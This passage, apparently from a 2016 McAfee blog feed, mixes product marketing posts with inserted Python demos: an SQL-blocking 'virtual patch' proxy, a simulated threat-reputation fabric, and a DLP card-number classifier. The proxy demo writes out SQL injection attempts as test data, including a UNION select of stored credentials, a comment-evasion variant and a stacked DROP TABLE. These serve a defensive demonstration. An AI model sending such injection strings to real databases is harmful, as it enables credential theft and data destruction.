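        if pattern.search(norm):
            return rule_id
    return None


class VirtualPatchProxy:
    """Policy enforcement point outside the DBMS: every statement passes through here,
    is logged, and is forwarded only if no rule matches. The database is never modified."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn, self.audit = conn, []

    def execute(self, sql: str, params=()):
        hit = match_rule(sql)
        self.audit.append(("block" if hit else "allow", hit, sql))
        if hit:
            raise PermissionError(f"blocked by virtual patch {hit}")
        return self.conn.execute(sql, params).fetchall()


def demo():
    conn = sqlite3.connect(":memory:")
    conn.executescript(  # constructed schema and data
        "CREATE TABLE users(id INTEGER, name TEXT);"
        "CREATE TABLE credentials(id INTEGER, secret TEXT);"
        "INSERT INTO users VALUES (1, 'alice');"
        "INSERT INTO credentials VALUES (1, 'hunter2');"
    )
    db = VirtualPatchProxy(conn)
    attempts = [
        ("SELECT name FROM users WHERE id = ?", (1,)),                                         # legitimate
        ("SELECT name FROM users WHERE id = 1 UNION SELECT secret FROM credentials", ()),       # plain
        ("SELECT name FROM users WHERE id = 1 uNiOn/**/SELECT secret FROM credentials", ()),  # evasion
        ("SELECT vuln_extract(secret) FROM credentials", ()),                                   # exploit
        ("SELECT name FROM users; DROP TABLE users", ()),                                       # stacked
    ]
    results = []
    for sql, params in attempts:
        try:
            results.append(db.execute(sql, params))
        except PermissionError as exc:
            results.append(str(exc))
    return results


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Two points carry over to real deployments. Normalisation is what makes the rules worth anything: without it, a comment or a change of case walks straight past a pattern. And a virtual patch narrows the window; it does not close it. The underlying flaw is still there for any path that bypasses the enforcement point, so the vendor fix should still be scheduled.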

A Virtual Patching Solution

McAfee Virtual Patching for Databases shields databases from the risk presented by unpatched vulnerabilities by detecting and preventing attempted attacks and intrusions in real time without requiring database downtime or application testing. This virtual patching solution also helps you continue to protect databases running old database management system (DBMS) versions that are no longer supported by the vendor, adding to the useful life of legacy databases and saving your organization time and money.

McAfee Virtual Patching Advantages

  • Gain protection from threats even before installing vendor released patch updates
  • Eliminate the need for IT and security teams to have DBMS knowledge
  • Keep production databases online, thanks to non-intrusive software design
  • Protect databases seamlessly with automatic distribution of ongoing updates
  • Facilitate compliance with standards such as PCI DSS, HIPAA, and others

 

CIO Blown Away with Migration to McAfee Endpoint Security 10.2 https://securingtomorrow.mcafee.com/business/cio-blown-away-migration-mcafee-endpoint-security-10-2/ https://securingtomorrow.mcafee.com/business/cio-blown-away-migration-mcafee-endpoint-security-10-2/#respond Thu, 05 Jan 2017 17:37:26 +0000 https://securingtomorrow.mcafee.com/?p=67675 Intrigued by McAfee Endpoint Security framework, the new more collaborative endpoint protection with dramatically improved performance, threat remediation, intelligence, and forensics? Wondering if you should migrate from your existing endpoint protection? CIO Harry Folloder was too, but no longer. Folloder heads information security at Waypoint, the leading food services sales and marketing company for North […]

The post CIO Blown Away with Migration to McAfee Endpoint Security 10.2 appeared first on McAfee Blogs.

Intrigued by the McAfee Endpoint Security framework, the new, more collaborative endpoint protection with dramatically improved performance, threat remediation, intelligence, and forensics? Wondering whether you should migrate from your existing endpoint protection?

CIO Harry Folloder was too, but no longer.

Folloder heads information security at Waypoint, the leading food services sales and marketing company for North America. The potential benefits of McAfee Endpoint Security 10, including better performance and faster, easier threat remediation, drove him to migrate from a previous McAfee endpoint suite sooner rather than later, and to renew Waypoint’s endpoint contract with McAfee for multiple years.

Under Folloder’s leadership, Waypoint recently deployed McAfee Endpoint Security 10.2 across the company’s approximately 1,500 endpoints, including three geographically dispersed data centers. Migration took only a few days and was very straightforward using McAfee ePolicy Orchestrator (ePO). Folloder, his staff, and end users are all extremely pleased with the result.

Folloder’s staff was particularly impressed with the upgraded endpoint protection’s additional actionable intelligence and forensics and enhanced graphical user interface, which presents actionable threat forensics in easily understood language. “We were just blown away by the intricate detail of the user experience, from the end user computing side but also from the admin side,” says Folloder. “[The new McAfee endpoint security framework] makes it easier for us to manage the endpoint and take corrective action.”


For Folloder, even more important than easy administration is improved ability to protect clients—corporate users as well as users at the companies that hire Waypoint’s services and deploy the company’s ATMs. All these users trust Folloder and his staff for the safety of their data and lines of business.

“My staff feels more comfortable with the security that [McAfee Endpoint Security] provides their teams and those we are charged with protecting,” declares Folloder. He says that the new McAfee endpoint security framework is easier to manage, provides more visibility, and is more stable. In addition, because it requires substantially less CPU resources to run and does not impact business operations, it has improved the computing experience of Waypoint’s end users.

“So for all those reasons we are very happy with [McAfee Endpoint Security 10],” concludes Folloder. He also adds that CIOs should partner with McAfee because McAfee is not only a leader but an innovator in technology. The new McAfee Endpoint Security framework is but one example.

To hear Folloder talk about his experience with McAfee Endpoint Security 10.2, click here.

 

 

New OpenDXL Clients released! Integrations Improve Endpoint Detection and Response, Intelligence Sharing, and Action Across Applications https://securingtomorrow.mcafee.com/business/new-opendxl-clients-released-integrations-improve-endpoint-detection-response-intelligence-sharing-action-across-applications/ https://securingtomorrow.mcafee.com/business/new-opendxl-clients-released-integrations-improve-endpoint-detection-response-intelligence-sharing-action-across-applications/#respond Thu, 05 Jan 2017 14:00:25 +0000 https://securingtomorrow.mcafee.com/?p=67606 This blog was written by Barbara Kay. Finding new ways to extract more value from security operations is a hot priority for most CISOs and security architects as they progress toward the goal of a proactive and optimized security operation. But according to our research, 26% of security operations centers (SOCs) still operate in reactive […]

The post New OpenDXL Clients released! Integrations Improve Endpoint Detection and Response, Intelligence Sharing, and Action Across Applications appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

Finding new ways to extract more value from security operations is a hot priority for most CISOs and security architects as they progress toward the goal of a proactive and optimized security operation. But according to our research, 26% of security operations centers (SOCs) still operate in reactive mode, with ad hoc approaches to security operations, threat hunting, and incident response. A fair amount of time is spent on scripting, log collection, and data manipulation, followed by propagating their assessment to the operational teams that need to act.

Often, the same sequence happens the next day with another endpoint or event and another analyst. The untold story is that analysts don’t have an easy way to integrate data and processes across tools, and then to make these tasks repeatable.

For example, how much time would you budget to integrate six products from four vendors to link countermeasures (firewall), investigation tools (endpoint detection and response), and remediation tools (vulnerability management and network access control)? Months? That’s if you can get access to the APIs at all.

New OpenDXL Clients Expedite Integration

With the release on GitHub of OpenDXL clients for McAfee Active Response (MAR) and McAfee Threat Intelligence Exchange (TIE), we have added more software that works with the open source OpenDXL Python client to orchestrate security. For any of you not familiar with OpenDXL, it provides an open, simple way to integrate technologies from different vendors with each other and with in-house developed applications. Enterprises get new, timely access to critical security intelligence and context, and can connect apps and processes into consistent and automated workflows. Learn more here.

The two new Python clients simplify access to the existing MAR and TIE DXL services, insulating developers from the MAR- or TIE-specific DXL topics and message formats. The MAR example illustrates the value of easy-to-use DXL services. For the integration scenario above, the engineering team wanted to connect McAfee products with Check Point, Rapid 7, and HP Aruba products. Rather than creating one-off native OpenDXL integrations for each of these three products, the engineers did two things: they created service wrappers for the products that are not natively DXL-integrated, and new, easy-to-use Python clients for MAR and TIE.

The service wrappers let the non-DXL APIs of the Rapid 7 and HP Aruba products be called via DXL; wrappers are the general means of integrating data and processes across tools. [I will go into this more in a future blog, or you can learn more now at github.com/opendxl.]

The new Python clients simplify the process of querying endpoints in your environment, reducing the effort from 120 lines of code (with pure OpenDXL) to 20 lines of code (with the MAR Python client).

The next new application that wants to search an endpoint—perhaps yours?—will also require just 20 lines of code. See for yourself how simple the integration is. Two sample search code files are here on GitHub:

There’s untapped potential for efficiency and better ideas as companies start using these capabilities with the OpenDXL SDK. Please learn more at www.mcafee.com/dxl and join the conversation on our community site.
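The HollyFrontier flow described earlier (an unknown file contained on the endpoint while ATD analyzes it, with the verdict shared to every endpoint through TIE over DXL) and the service-wrapper and client-library pattern described in this post can be shown together in one small program. It is an added example, not OpenDXL, TIE, MAR or ATD code: an in-process class stands in for the DXL broker, the topic names and trust levels are hypothetical, and a constructed marker-string rule plays the part of a sandbox verdict.

```python
import hashlib


class Fabric:
    """In-process stand-in for the DXL broker: request/response services keyed by topic,
    plus fire-and-forget events delivered to every subscriber."""
    def __init__(self):
        self._services, self._subs = {}, {}
    def register_service(self, topic, handler):
        self._services[topic] = handler
    def request(self, topic, payload):
        if topic not in self._services:
            raise LookupError(f"no service registered on {topic}")
        return self._services[topic](payload)
    def subscribe(self, topic, callback):
        self._subs.setdefault(topic, []).append(callback)
    def publish(self, topic, payload):
        for callback in self._subs.get(topic, []):
            callback(payload)


KNOWN_BAD, UNKNOWN, KNOWN_GOOD = 1, 50, 99  # hypothetical trust levels, not TIE's real scale


class ReputationService:
    """TIE-like store: answers lookups and broadcasts every reputation change."""
    def __init__(self, fabric):
        self.fabric, self.db = fabric, {}
        fabric.register_service("/svc/reputation/get",
                                lambda m: {"trust": self.db.get(m["sha256"], UNKNOWN)})
        fabric.register_service("/svc/reputation/set", self._set)

    def _set(self, msg):
        self.db[msg["sha256"]] = msg["trust"]
        self.fabric.publish("/event/reputation/change", msg)
        return {"ok": True}


class LegacySandboxApi:
    """Stand-in for a product with a plain, non-DXL API (think REST); knows nothing of topics."""
    def analyze(self, data: bytes) -> dict:
        # Constructed detonation rule: a marker string plays the part of observed behaviour.
        return {"malicious": b"ENCRYPT_ALL_FILES" in data}


def wrap_as_service(fabric, topic, fn):
    """Service wrapper: put a plain callable on a topic so any fabric client can call it."""
    fabric.register_service(topic, lambda msg: fn(bytes.fromhex(msg["hex"])))


class ReputationClient:
    """Client library: callers never see topic names or message layout."""
    def __init__(self, fabric):
        self.fabric = fabric
    def lookup(self, sha256):
        return self.fabric.request("/svc/reputation/get", {"sha256": sha256})["trust"]
    def set(self, sha256, trust):
        return self.fabric.request("/svc/reputation/set", {"sha256": sha256, "trust": trust})


class Endpoint:
    """Reputation-gated execution: an unknown file runs contained until a verdict arrives."""
    def __init__(self, name, fabric):
        self.name, self.fabric, self.rep = name, fabric, ReputationClient(fabric)
        self.contained, self.log = set(), []
        fabric.subscribe("/event/reputation/change", self._on_change)

    def _on_change(self, msg):
        # A verdict from one host's submission reaches every subscriber, not only the submitter.
        if msg["trust"] <= KNOWN_BAD:
            self.log.append(f"{self.name}: now blocking {msg['sha256'][:12]}")
        self.contained.discard(msg["sha256"])

    def execute(self, data: bytes) -> str:
        digest = hashlib.sha256(data).hexdigest()
        trust = self.rep.lookup(digest)
        if trust <= KNOWN_BAD:
            return "blocked"
        if trust >= KNOWN_GOOD:
            return "allowed"
        self.contained.add(digest)  # DAC-style: keep running, but with restricted privileges
        verdict = self.fabric.request("/svc/sandbox/analyze", {"hex": data.hex()})
        self.rep.set(digest, KNOWN_BAD if verdict["malicious"] else KNOWN_GOOD)
        return "contained->blocked" if verdict["malicious"] else "contained->allowed"


def demo():
    fabric = Fabric()
    ReputationService(fabric)
    wrap_as_service(fabric, "/svc/sandbox/analyze", LegacySandboxApi().analyze)
    host_a, host_b = Endpoint("host-a", fabric), Endpoint("host-b", fabric)
    sample = b"MZ\x90\x00 ... ENCRYPT_ALL_FILES ..."  # constructed bytes, not real malware
    first = host_a.execute(sample)   # unknown -> contained -> detonated -> known bad
    second = host_b.execute(sample)  # host-b never detonates: the verdict was already shared
    return first, second, host_b.log
```

Two things in `demo()` are the point of the pattern: the wrapped sandbox API never learns about topics, and the second host blocks the file without detonating it because the first host’s verdict was published to everyone. The same property is the thing to protect in a real fabric: whoever can publish on the reputation topic can mark a file good, so the brokers must authenticate publishers and restrict who may write to that topic.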

How McAfee Evolved A Software Company’s Security System to Combat Today’s Threats https://securingtomorrow.mcafee.com/business/mcafee-evolved-software-companys-security-system-combat-todays-threats/ https://securingtomorrow.mcafee.com/business/mcafee-evolved-software-companys-security-system-combat-todays-threats/#respond Thu, 22 Dec 2016 16:00:55 +0000 https://securingtomorrow.mcafee.com/?p=67368 To Nirdosh Kumar, the lead security administrator at a global software company, cybersecurity is evolving.  “You cannot think of all the preventions,” Kumar explained, “hackers are knowledgeable.” And since his company needed to keep pace with these intelligent cybercriminals to stay secure, their focus had to change. They decided to move beyond only relying on […]

The post How McAfee Evolved A Software Company’s Security System to Combat Today’s Threats appeared first on McAfee Blogs.

To Nirdosh Kumar, the lead security administrator at a global software company, cybersecurity is evolving.  “You cannot think of all the preventions,” Kumar explained, “hackers are knowledgeable.” And since his company needed to keep pace with these intelligent cybercriminals to stay secure, their focus had to change. They decided to move beyond only relying on prevention, and instead began to turn their attention towards detection.

To achieve these detection goals, the cloud-based software company put its trust in an end-to-end solution from McAfee, knowing it could provide comprehensive protection for the entire company.

To start achieving this better level of security, the software company began with the McAfee ePO Cloud console as the core of its system, along with McAfee AntiVirus, McAfee Disk Encryption, and McAfee MOVE AntiVirus, the newest of these, built for cloud infrastructure. MOVE AntiVirus provided advanced malware protection for the company’s virtual environment while also running regular security scans.

In addition to increased detection, Kumar also noted the important impact of an interconnected security system.  He stated, “security products need to talk to each other.” Therefore, in order to achieve this connected approach, the software company utilized McAfee DXL and McAfee TIE. Working in conjunction, both of these solutions combined multiple threat information sources and shared that information with all connected security platforms. Pleased with such openness, Kumar noted, “with TIE and DXL, I love how all things are connected now, even third party products are connected.”

This interconnected system allowed the software company to thrive; they finally felt they were evolving and able to combat ever-changing security threats. As Kumar put it, “we are going into the right direction.”

 

New Server Security Release Makes Borderless Cloud Security a Reality https://securingtomorrow.mcafee.com/business/cloud-security/new-server-security-release-makes-borderless-cloud-security-reality/ https://securingtomorrow.mcafee.com/business/cloud-security/new-server-security-release-makes-borderless-cloud-security-reality/#respond Thu, 15 Dec 2016 14:00:05 +0000 https://securingtomorrow.mcafee.com/?p=66621 This blog post was written by Teresa Wingfield. Cloud Workload Discovery, first announced in July 2016, covered Amazon Web Services (AWS) and Microsoft Azure. Cloud Workload Discovery for hybrid cloud, available on December 19, 2016, extends coverage to VMware and OpenStack private clouds. As the hybrid data center expands, tracking down the blind spots keeps getting […]

The post New Server Security Release Makes Borderless Cloud Security a Reality appeared first on McAfee Blogs.

This blog post was written by Teresa Wingfield.

Cloud Workload Discovery, first announced in July 2016, covered Amazon Web Services (AWS) and Microsoft Azure. Cloud Workload Discovery for hybrid cloud, available on December 19, 2016, extends coverage to VMware and OpenStack private clouds.

As the hybrid data center expands, tracking down the blind spots keeps getting harder.  Organizations struggle to assess their end-to-end security posture for workloads and platforms, monitor and protect workloads across all clouds and maintain regulatory compliance.

Cloud Workload Discovery for hybrid clouds provides end-to-end visibility into all workloads and their underlying platforms to make borderless cloud security a reality.  With deep visibility, assessment and remediation for compute, storage, and network as shown in the diagram below, organizations are able to assess end-to-end security posture (workloads and platforms), monitor and protect workloads across all private and public clouds and maintain regulatory compliance.

Figure: Cloud Workload Discovery for Hybrid Cloud

How Cloud Workload Discovery Works

Cloud Workload Discovery for hybrid cloud provides three main capabilities:

  • Discovery of weak security controls for VMware, OpenStack, AWS and Microsoft Azure
  • Platform security audit, including firewall and encryption settings, for AWS and Microsoft Azure
  • Traffic and network threat visibility for AWS

These insights lead to faster detection, while McAfee® ePolicy Orchestrator® (McAfee ePO™) or DevOps tools such as Chef, Puppet, and OpsWorks enable quick remediation.

Cloud Workload Discovery’s integration with McAfee ePO, a single management platform with simplified workflows, gives organizations effective control to help implement security solutions across physical, virtual and cloud environments. Since Cloud Workload Discovery is agentless and powered by API integration with cloud providers, security administrators just enter their cloud account credentials in McAfee ePO to discover workloads, address threat alerts and enforce policies. Quick time to value and a low learning curve mean that you can significantly improve your cloud workload security with minimal involvement from your IT security team.

Learn More

For more details on Cloud Workload Discovery, click here.

Also, check out our three Cloud Workload Discovery options that we offer to meet your cloud security requirements:

McAfee Labs December Threats Report Explores Many Facets of Deception https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-december-threats-report-explores-many-facets-deception/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-december-threats-report-explores-many-facets-deception/#respond Tue, 13 Dec 2016 05:01:55 +0000 https://securingtomorrow.mcafee.com/?p=67017 This blog post was written by Vincent Weafer. In the McAfee Labs Threats Report: December 2016 published today, we write about three seemingly disparate topics. However, on closer inspection, they have a common thread. All discuss deception in one way or another, whether ways in which ransomware authors have enhanced their code to sidestep sandboxes, […]

The post McAfee Labs December Threats Report Explores Many Facets of Deception appeared first on McAfee Blogs.

This blog post was written by Vincent Weafer.

In the McAfee Labs Threats Report: December 2016 published today, we write about three seemingly disparate topics. However, on closer inspection, they have a common thread. All discuss deception in one way or another, whether ways in which ransomware authors have enhanced their code to sidestep sandboxes, how Trojans infect legitimate code to appear benign, or the challenges SOCs face as they try to detect potential attacks from malware that uses increasingly sophisticated evasion techniques.

In the ransomware story, we summarize “the year in ransomware,” as that form of threat saw a huge jump in the number of ransomware attacks; it captured most of the cyberattack headlines. To fuel its growth, ransomware authors made many technical advances this year:

  • Anti-sandboxing: Detecting and evading security sandboxes used to test suspicious code.
  • Exploit kits: A cat-and-mouse game of increasing exploit kit sophistication to stay ahead of defenses.
  • Disk encryption: Partial disk encryption that overwrites the master boot record, and full disk encryption that encrypts a complete partition.
  • Website encryption: Encryption of websites used by legitimate applications, making the apps useless until the site is decrypted.
  • Ransomware-as-a-service: Attackers pay service providers for the use of infrastructure and ransomware.

The good news is that the white hats are fighting back, with some success. Defenses are getting better, law enforcement and security vendors are collaborating to take down ransomware networks, and a jointly founded initiative, No More Ransom!, was formed to provide prevention advice, investigation assistance, and decryption tools. More than one dozen law enforcement agencies and multiple security technology vendors are now part of the No More Ransom! collaboration, with more to come in the very near future!

To learn more about defending against ransomware, read our Technical Brief How to Protect Against Ransomware. More information about ransomware and ways to protect against it can be found here.

 

The Trojan story explains how this type of malware infects legitimate code and hides out, hoping to go unnoticed as long as possible to maximize payouts. We show how attackers create long-lasting, fully undetectable malware by modifying source code or executables, inserting patches on the fly through man-in-the-middle attacks, or tricking application authors to include malicious libraries.

Attackers who specialize in Trojans enjoy an impression of legitimacy, as their malware hides behind recognized brands or apps. The “Trojanized” legitimate apps often provide cover during security scans and forensic analysis. And the Trojans enjoy free persistence, courtesy of app users who depend on the apps for day-to-day activities.

To learn more about defending against Trojanized legitimate software, read our Solution Brief How to Protect Against Trojans.

 

Our third story is about security operations centers, or SOCs. McAfee commissioned a primary research study to gain a deeper understanding of the ways in which enterprises use security operations centers, how they have changed over time, and what they will look like in the future.

Among other things, we learned of:

  • Alert overload: SOC managers are unable to sufficiently investigate 25% of their security alerts.
  • Triage trouble: 93% of SOC managers are overwhelmed by alerts and unable to triage all potential threats.
  • Incidents on the rise: 67% of SOC managers report an increase in security incidents.
  • Proactive vs. reactive: 26% of SOCs operate in a reactive mode with ad-hoc approaches to security operations, threat hunting, and incident response.
  • Highest priority for SOCs growth and investment: SOC owners want to improve their ability to respond to confirmed attacks, which includes the ability to coordinate, remediate, eradicate, learn, and prevent recurrences.

To learn how to optimize security operations centers, read our white paper Sustainable Security Operations.

 

Finally, we highlight significant threat activity and statistics for Q3.

  • Malware: McAfee Labs measured 245 new threats every minute, or more than four every second. New malware dropped 21% in Q3, but total malware has grown 29% in the past year.
  • Ransomware: Total ransomware grew by 18% in Q3 and 80% since the beginning of the year.
  • Mobile malware: There were two million new mobile malware threats in Q3, the highest ever recorded. Total mobile malware has grown 138% in the past year.
  • Mac OS malware: New Mac OS malware skyrocketed by 637% in Q3, but the increase was due primarily to a single adware family, Bundlore.
  • Macro malware: New Microsoft Office macro malware continued the increase first seen in Q2. Total macro malware has grown 115% since the beginning of 2016.

 

For more information on these key topics, or more threat landscape statistics for Q3 2016, click here.

 

How McAfee Threat Intelligence Exchange Aids in Saving Money and Saving Lives https://securingtomorrow.mcafee.com/business/mcafee-threat-intelligence-exchange-aids-saving-money-saving-lives/ https://securingtomorrow.mcafee.com/business/mcafee-threat-intelligence-exchange-aids-saving-money-saving-lives/#respond Thu, 08 Dec 2016 18:15:08 +0000 https://securingtomorrow.mcafee.com/?p=66949 For Kirk Davis, Director of Information Security at Vidant Health, tough days at work feature security events big and small. One especially tough day was when the North Carolina not-for-profit healthcare company was attacked by a Cryptowall Trojan that was able to encrypt half a million files before his team could respond. Soon enough, these […]

The post How McAfee Threat Intelligence Exchange Aids in Saving Money and Saving Lives appeared first on McAfee Blogs.

For Kirk Davis, Director of Information Security at Vidant Health, tough days at work feature security events big and small. One especially tough day was when the North Carolina not-for-profit healthcare company was hit by a Cryptowall Trojan that encrypted half a million files before his team could respond. Soon enough, these tough days began to get in the way of the work he wanted to be doing: improving the clinical workflows that support patient care.

With his time consumed by cleanup after such attacks, Davis wanted a way to become both proactive and efficient. He noted, “how fast we consolidate events and alerts and get actionable information can be the critical difference between very positive and very negative outcomes.” Knowing he needed to reduce the noise in Vidant Health’s security environment to get those positive outcomes, Davis surveyed the market for a cohesive, automated security system.

After an extensive search, Davis and the Vidant Health team selected McAfee to act as the backbone behind their patient-centered business and to help them grow. To accomplish this feat, they selected the McAfee SIEM solution, McAfee Enterprise Security Manager, and its McAfee Advanced Correlation Engine, as well as McAfee Advanced Threat Defense and McAfee Threat Intelligence Exchange.

McAfee Threat Intelligence Exchange combines internal and external threat information and uses the McAfee Data Exchange Layer to share it immediately with the organization’s other connected security solutions. Vidant Health then uses the McAfee SIEM and Advanced Correlation Engine to identify and score threat events in real time.

The healthcare company soon saw a drastic change with the newly interconnected system. As Davis says, “within days of deployment we were ingesting NetFlow information from a wide range of sources, sharing context and threat intelligence, and picking up an amazing amount of actionable data”. With McAfee Advanced Threat Defense and McAfee Threat Intelligence Exchange in place, Vidant Health also began catching malware of all kinds, including the particularly effective Cryptowall.

More importantly, the team can now find “patient zero”, the first infected device, and quarantine and remediate it. Davis plans to apply the same approach to every infected device in future: isolate it immediately and push remediation from the McAfee ePO central console.

Because the McAfee system is automated, the team has room for bigger goals. As Davis notes, it “allows us to not worry about the things that can best be handled by computers and focus on the things we do best…we have been freed up to add value in other areas where it supports the business.”

In addition to freeing up time and other valuable resources, the interconnected system frees up funds, since less time spent on remediation means cost savings. Davis even asserted, “I would say that McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense paid for themselves within the first six months.”

Saving money and sharing threat intelligence across all devices strengthens Vidant Health today, but Davis knows adaptability will remain essential against future threats. He states, “moving forward, we will be focused much more keenly on ensuring that we have an environment that can learn and automatically remediate threats when they do happen. Without a doubt, the most valuable aspect of the McAfee SIEM and integrated framework is its adaptability and flexibility.” That adaptable framework, with McAfee ePO software as the backbone of the whole system, lets it keep pace with Vidant Health’s changing needs.

This flexibility was one of the many factors that made Vidant Health feel they had found a great business partner in McAfee, one that understands how every dollar spent ends up on a patient’s bill and has to translate into value, ultimately, for patients. A business partner, they also noted, that has created a competitive advantage for them as an organization.

With that advantage, Vidant Health has been able to accomplish their ultimate goal – keeping people healthy. Davis adds that now “my team dedicates itself every day to doing whatever we can do to improve the health of the 1.4 million people we serve here in eastern North Carolina. It’s a great feeling to know that what we have accomplished through our partnership with McAfee has supported us in that objective.”

To read the full case study, click here and get your questions answered by tweeting @McAfee_Business. To watch the two Vidant Health videos, click here and here.

Who Let the Data Out? Who, Who, Who, Who? (Part 3 of 3)
https://securingtomorrow.mcafee.com/business/data-security/who-let-the-data-out-who-who-who-who/
Tue, 29 Nov 2016 17:26:16 +0000

The post Who Let the Data Out? Who, Who, Who, Who? (Part 3 of 3) appeared first on McAfee Blogs.

It feels like the last song of the concert—this is the final blog in our cybersecurity benchmark series! As every good detective starts with information, we’ve been digging into the classic six “w” questions: who, what, when, where, why, and how. To find those answers for security professionals, data was combined from Ponemon Institute’s global survey of IT decision makers, the Verizon DBIR, and Grand Theft Data: 2015 McAfee Data Exfiltration Study.

If you’re just tuning in, catch up on our previous blogs. Now we’ll turn our attention to assess how cybersecurity teams are performing and areas for improvement. It’s also the last of our security-related song titles, so get ready for the final countdown!

A Hard Day’s Cybersecurity Focus

We know that cybersecurity threats are on the rise, so where are companies focusing their efforts? The most likely exfiltration methods are clearly on their radar: 70% of companies monitor for suspicious emails and 50% for inappropriate access to sensitive data. Given how prominent those threats are, both numbers should be higher. Looking from the other side, more than 25% of companies don’t monitor access to employee or customer data, and only 37% monitor both. Holistic monitoring is still not the norm.

Many organizations also struggle to configure their security solutions. Among teams that don’t understand how the technology works, 65% are not monitoring personally identifiable information at all, a real concern given the rising demand for such data.

So where should organizations focus their efforts? Certain business events invite greater risk, and it’s important to identify them. New product launches and strategic planning generate more sensitive data, so it’s no surprise that incidents cluster around them. Companies have tuned into that fact, and the rise in related incidents has been relatively minor. Other events, however, are now driving more and more data loss. Quarterly reports and other financial disclosures are prime targets, and employees’ use of social media is another driver, unique in its ability to generate sources for cyber-crooks. Clearly, the industry needs a hard day’s focus.

Treat You Better, Monitoring Solutions

In assessing the adequacy of security defenses, false negatives are a key signal. We gain insight by asking, among organizations that use data loss prevention solutions, how many breaches still occur. That tells us whether good tools and best practices are actually making a difference, or whether organizations are simply unaware of incidents that are occurring.

To answer that question, let’s first recall a fact from the first blog: an increasing percentage of breaches are being discovered by external sources. Those sources have more detection methods and can build a composite view of victims’ data loss. Measured against that, among respondents who don’t know how their monitoring technology works, 23% are unsure whether they suffer data loss, and the remaining 77% believe they suffer none at all. Such confidence is dangerous: the numbers clearly show incidents on the rise, which points to a lack of proper monitoring in many organizations.

Walk On the Secure Side

Before we get into our final suggestions, let’s review the state of the industry. The gap between data loss and its discovery is widening, especially for internal teams. While industries that handle payment information have been the most targeted in the past, their loss prevention systems are maturing; demand is now shifting to personally identifiable information, health data, and intellectual property. Among data types, unstructured formats are particularly hard to monitor with regular expressions, which makes simple configurations risky. Physical media also shouldn’t be underestimated: it accounts for the second highest number of incidents. The takeaway? Visibility is becoming increasingly crucial.

But there’s good news: organizations can employ a host of tactics to bolster their defenses. The process should start with business requirements, identifying which data is most sensitive. Once that’s done, server and endpoint scanning can monitor for that information. Teams can further use classification tools, security notifications, and value recognition to maintain awareness, and movement of crucial data can be flagged when it is not part of a normal business process. Justification screens help users understand what is acceptable and what is not. Finally, after assigning owners and separating duties, policies can block suspicious data transfers.
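The point about regular expressions and unstructured data is easiest to see in code. The following is an added example, not McAfee’s code and not part of the benchmark study: a naive digit-run rule beside a stricter rule that also applies a Luhn check and a simplified issuer-prefix list, plus a policy decision that allows, blocks, or asks for a justification depending on where restricted data is headed. The sample documents, the destination names, and the prefix list are constructed for illustration.

```python
import re

# Constructed sample documents (not from the study): one genuine card-number
# format and two look-alike digit runs that a naive rule will also flag.
SAMPLE_DOCS = {
    "refund_note.txt": "Refund approved for card 4111 1111 1111 1111, cardholder J. Doe.",
    "logistics.txt": "Shipment tracking 1234567890123 left the warehouse at 09:10.",
    "inventory.csv": "asset,serial\nlaptop-07,9876543210987654",
}

# Naive DLP rule: any run of 13-19 digits, optionally separated by spaces or dashes.
DIGIT_RUN = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Stricter rule adds a Luhn checksum and a simplified, assumed issuer-prefix list.
ISSUER_PREFIXES = ("4", "34", "37", "51", "52", "53", "54", "55", "6011", "65")


def luhn_ok(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def naive_matches(text: str) -> list[str]:
    """Digit runs the naive regex flags as card numbers (separators stripped)."""
    return [re.sub(r"\D", "", m.group(0)) for m in DIGIT_RUN.finditer(text)]


def strict_matches(text: str) -> list[str]:
    """Only runs that also pass Luhn and start with a plausible issuer prefix."""
    return [d for d in naive_matches(text)
            if luhn_ok(d) and d.startswith(ISSUER_PREFIXES)]


def classify(text: str, strict: bool = True) -> str:
    """Label a document 'restricted' if it appears to contain card data."""
    hits = strict_matches(text) if strict else naive_matches(text)
    return "restricted" if hits else "internal"


def scan(docs: dict[str, str]) -> dict[str, dict[str, str]]:
    """Classify each document under both rules so the false positives are visible."""
    return {name: {"naive": classify(text, strict=False),
                   "strict": classify(text, strict=True)}
            for name, text in docs.items()}


# Assumed policy: destinations that are part of a normal business process for
# restricted data. Anything else is blocked, except internal-but-unusual
# destinations, where the user is shown a justification screen instead.
SANCTIONED_RESTRICTED_DESTINATIONS = {"payments-processor.example"}
INTERNAL_SUFFIX = ".corp.example"


def decide(label: str, destination: str) -> str:
    """Policy decision for moving a document with `label` to `destination`."""
    if label != "restricted":
        return "allow"
    if destination in SANCTIONED_RESTRICTED_DESTINATIONS:
        return "allow"
    if destination.endswith(INTERNAL_SUFFIX):
        return "justify"   # prompt the user to justify the transfer
    return "block"


if __name__ == "__main__":
    for name, labels in scan(SAMPLE_DOCS).items():
        print(f"{name:18} naive={labels['naive']:10} strict={labels['strict']}")
    print(decide("restricted", "personal-share.example"))
```

Run as-is, the naive rule labels all three documents restricted, while the stricter rule keeps only the refund note; the tracking number and serial both fail the Luhn check. Real DLP engines use the same layering (pattern, validator, context, then policy), and the lesson carries: a regex alone over free-form text produces noise that users learn to ignore.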

By using an intelligent plan for data loss prevention, organizations can truly be resilient in the face of increasing threats. Surely, that will have cybercriminals singing to a different tune.

That’s a wrap for this blog series! To stay informed, follow @McAfee and @McAfee_Business for the latest. And as always, feel free to tweet any thoughts or questions with the hashtag #WhoLetTheDataOut.

‘McAfee Labs 2017 Threats Predictions’ Report Zeroes In on Cloud and IoT Threats
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2017-threats-predictions-report-zeroes-cloud-iot-threats/
Tue, 29 Nov 2016 05:04:32 +0000

The post ‘McAfee Labs 2017 Threats Predictions’ Report Zeroes In on Cloud and IoT Threats appeared first on McAfee Blogs.

This blog post was written by Vincent Weafer.

In the McAfee Labs 2017 Threats Predictions report, published today, we cover a lot of ground but focus particularly on two areas that will impact IT security for years to come: threats to the cloud and the Internet of Things.

